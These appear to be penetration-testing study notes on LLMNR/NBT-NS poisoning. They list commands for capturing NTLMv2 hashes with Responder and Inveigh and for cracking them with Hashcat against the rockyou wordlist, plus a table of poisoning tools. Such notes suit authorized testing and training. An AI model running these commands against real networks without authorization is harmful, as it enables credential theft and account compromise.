Captured NTLMv2 hash

From linux

sudo responder -I ens224

We should start Responder and let it run for a while in a tmux window while we perform other enumeration tasks to maximize the number of hashes that we can obtain. Once we are ready, we can pass these hashes to Hashcat using hash mode 5600 for NTLMv2 hashes that we typically obtain with Responder. We may at times obtain NTLMv1 hashes and other types of hashes, and can consult the Hashcat example hashes page to identify them and find the proper hash mode. If we ever obtain a strange or unknown hash, this site is a great reference to help identify it.

Cracking an NTLMv2 Hash With Hashcat

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

From windows

Inveigh - powershell version

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

InveighZero - C# version

# run powershell as Admin
.\Inveigh.exe -Sniffer N
> Press ESC to enter/exit interactive console
>> HELP
>> GET NTLMV2UNIQUE
>> GET NTLMV2USERNAMES

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Tools

Tool	Description
Responder	Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh	Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit	Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.